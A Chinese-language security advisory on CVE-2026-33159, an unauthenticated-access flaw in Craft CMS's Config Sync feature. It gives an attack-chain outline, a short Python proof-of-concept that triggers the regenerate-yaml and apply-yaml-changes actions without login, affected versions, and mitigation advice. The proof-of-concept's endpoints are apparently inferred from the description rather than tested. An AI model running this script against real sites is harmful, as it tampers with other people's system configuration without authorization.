CVE-2026-33159 CVSS 6.5 中危

CVE-2026-33159 Craft CMS未授权访问漏洞

披露日期: 2026-03-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33159

漏洞类型

未授权访问

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Craft CMS

漏洞概述

Craft CMS在特定版本中存在安全漏洞，允许未授权的访客用户访问Config Sync更新器索引。攻击者可获取签名数据并执行状态更改操作，如重新生成YAML或应用YAML更改，而无需身份验证。该漏洞可能影响系统配置的完整性和保密性。

技术细节

该漏洞源于Craft CMS中Config Sync功能的访问控制机制失效。在受影响版本中，系统未能正确验证用户身份，即允许未授权的匿名用户访问Config Sync updater index。攻击者可以通过构造特定的HTTP请求，直接调用敏感API端点，获取经过签名的配置数据。由于系统未对“regenerate-yaml”和“apply-yaml-changes”等操作实施权限校验，攻击者可远程触发这些状态更改操作。这使得攻击者能够篡改系统配置，可能导致数据泄露或服务异常，且整个过程无需任何用户交互或账户凭证。

攻击链分析

STEP 1

侦察

攻击者识别出目标网站使用的是Craft CMS，且版本在受影响范围内（4.0.0-RC1至4.17.8之前或5.0.0-RC1至5.9.14之前）。

STEP 2

访问

攻击者无需登录凭证，直接向Craft CMS的Config Sync更新器索引发送HTTP请求。

STEP 3

利用

攻击者利用漏洞触发状态更改操作，例如发送请求执行regenerate-yaml或apply-yaml-changes。

STEP 4

影响

系统响应请求，允许攻击者获取配置数据或篡改系统配置，造成完整性影响。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example, actual endpoint may vary based on installation)
target_url = "http://target-craft-cms.com"

# Vulnerable endpoints for Config Sync actions based on the description
endpoints = [
    "/actions/config-sync/regenerate-yaml",
    "/actions/config-sync/apply-yaml-changes"
]

# Exploit function
def exploit():
    for endpoint in endpoints:
        try:
            # Send request without authentication (Guest user)
            response = requests.get(f"{target_url}{endpoint}")
            
            # Check if the action was successful (Status 200 usually indicates access)
            if response.status_code == 200:
                print(f"[+] Successfully triggered action: {endpoint}")
                print(f"[+] Response: {response.text[:100]}")
            else:
                print(f"[-] Failed to trigger action: {endpoint}, Status: {response.status_code}")
        except Exception as e:
            print(f"[!] Error: {e}")

if __name__ == "__main__":
    exploit()

影响范围

Craft CMS 4.0.0-RC1 to 4.17.7

Craft CMS 5.0.0-RC1 to 5.9.13

防御指南

临时缓解措施

建议立即检查并升级至修复版本。若暂时无法升级，应在网络边界（如防火墙或反向代理）上阻断对外部未认证用户访问Config Sync相关路径的请求，或暂时禁用Config Sync插件以降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表